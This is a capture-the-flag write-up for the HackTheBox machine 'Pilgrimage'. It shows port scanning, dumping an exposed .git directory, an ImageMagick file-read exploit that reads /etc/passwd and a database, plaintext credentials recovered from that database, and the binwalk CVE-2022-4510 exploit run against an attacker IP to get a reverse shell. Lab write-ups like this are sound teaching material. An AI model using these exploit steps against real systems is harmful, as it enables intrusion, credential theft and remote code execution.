$ nmap -p- --min-rate 3000 10.129.29.28
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 16:31 +08
Warning: 10.129.29.28 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.29.28
Host is up (0.17s latency).
Not shown: 60710 closed tcp ports (conn-refused), 4823 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We have to add pilgrimage.htb to our /etc/hosts file to view the web application.
Image Shrinker -> .git
The website offers a service to shrink images.
If we upload an image, we would get back a URL:
Interesting! This image is probably being passed somewhere into a command line instance. Anyways, before going that route, I did a directory and subdomain enumeration first using gobuster and wfuzz.
A few directories were picked up by the more popular wordlists, but all led to nothing much. I ran one with the dirsearch.txt wordlist, and found that a .git directory exists on the machine:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/dirsearch.txt -u http://pilgrimage.htb -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pilgrimage.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/dirsearch.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/06/25 16:38:52 Starting gobuster in directory enumeration mode
===============================================================
/. (Status: 200) [Size: 7621]
/.git/config (Status: 200) [Size: 92]
We can download this entire directory using git-dumper:
This tool also checks out for us, and we get the source code of the website:
$ ls
assets dashboard.php index.php login.php logout.php magick register.php vendor
Image Magick -> LFI
One of the files is the magick binary, which is probably referring to Image Magick. Running it with the --version flag reveals that this is using an oudated version of it:
The exploit path would be to get an LFI and download the entire database to find credentials. The ExploitDB PoC brings us to this repository:
I cloned it and ran this as a first test:
cargo run "/etc/passwd"
Afterwards, we can upload the image.png file to the website and download it again. When we run identify on it, it would some hex stuff appended at the end:
If we convert this to text, we would get the /etc/passwd file, meaning it worked:
Now we can replace the file with /var/db/pilgrimage. This would give us a humongous hex output, and after removing the irrelevant parts, we can convert it using xxd to get a SQLite file.
$ cat output| xxd -r -p > db
$ file db
db: SQLite 3.x database, last written using SQLite version 3034001, file counter 69, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 69
We can use sqlite3 to view the file and find some credentials:
sqlite> SELECT * from users;
emily|abigchonkyboi123
This uses inotifywait to wait for files present in the /shrunk directory (which is where images uploaded are stored), and then it uses binwalk on them to make sure that there's no hidden stuff within it.
We can enumerate the version of binwalk being used:
There are public RCE exploits for this particular version:
We can use this script to embed a payload within an empty image (run touch sample.png).
$ python3 pe_rce.py sample.png 10.10.14.86 4444
################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################
You can now rename and share binwalk_exploit and start your local netcat listener.
Afterwards, we can download this file to the /var/www/pilgrimage.htb/shrunk folder as anything. If you monitor pspy64 output, this would cause the malwarescan.sh script to be run, and our listener port would have a reverse shell!